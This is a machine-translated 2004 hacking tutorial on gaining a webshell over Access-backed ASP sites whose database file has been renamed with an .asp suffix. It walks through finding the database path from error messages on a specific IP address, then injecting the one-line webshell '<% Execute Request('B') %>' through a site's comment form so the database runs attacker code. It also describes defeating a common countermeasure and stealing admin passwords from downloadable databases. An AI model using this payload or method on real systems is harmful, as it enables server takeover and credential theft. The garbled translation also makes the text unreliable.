Author: SuperHei · Lilo article in Nature: Original release date: 2004-09-16 possible with the development of network security technology bar, are improving the quality of administrators, when using access asp system, the database is not being Download, change MDB to ASP or ASA. Don't say it directly to the suffix, you can directly download the tools and other tools. In fact, you have opened the door for the invaders. Intruders can get WebShell directly using the ASP / ASA for the suffix database. One. Everyone knows that <%%> is the flag of the ASP file, that is, an ASP file will only perform code between <%%>, all data of the Access ASP web system is stored in the database file (MDB File), since the manager changes the MDB file to an ASP file, if we submit it contains <%%>, then the code between <%%> is performed when we access this ASP database. This leads us that we only submit malicious code to the database, then the ASP suffix database is our webhell. two. The example is just a goal, first of all our branches, see if the ASP suffix database: http://220.170.151.103/test/dlog\showlog.asp? Cat_id = 5 & log_id = 210 Returns:
Program code: [Copy code to clipboard]
Microsoft VBScript compile error Error '800A03F6' missing 'end' / Iishelp / common / 500-100.asp, line 242MICROSOFT JET DATABASE Engine error '80004005''d: /log_mdb/)dlog_mdb).asp' is not a valid path. Determine if the path name spell is correct, and whether it is connected to the server stored. /TEST/CONN.ASP, line 18
We submitted: http://220.170.151.103/test/dlog/log_mdb/%29dlog_mdb%29.asp returns a bunch of garbled, so we can download the database directly with Internet expressions (here we don't discuss). We return to the homepage to see there is a "netizen comment" function. We register a user, send a comment:
Program code: [Copy code to clipboard]
<% Execute Request ("B")%> So we write the ASP code: <% execute request ("b")%>, then the database: is our WebShell. Submitted: http://220.170.151.103/test/dlog/log_mdb/%29dlog_mdb%29.asp In the final we see: /iishelp/common/500-100.asp, line 242 Microsoft VBScript runtime error error ' 800A000D 'type does not match:' Execute '/ test / dlog / log_mdb /% 29dlog_mdb% 29.asp, line 1266
Haha, our inserted code is running. As follows: Note: When we submit a code to the database, the code content is not too big. So we use
Program code: [Copy code to clipboard]
<% Execute Request ("B")%>. three. Some other questions and ideas 1. For the addition of the suffix asp, illegally add illegal ASP code such as <% = 'a'-1%> to completely prevent the downloaded database, because there is an illegal ASP code, inserting our webshell code Running will only display the error of the previous illegal code without performing our shell code. Although this can prevent certain attacks, there is still a certain hidden danger, we can get the correct display of WebShell code before you add a compatible error before the error code. 2. For those who do not have a suffix, that is, MDB files so we can download it directly to get the background password, entered the background, can use the database backup to be used as ASP.
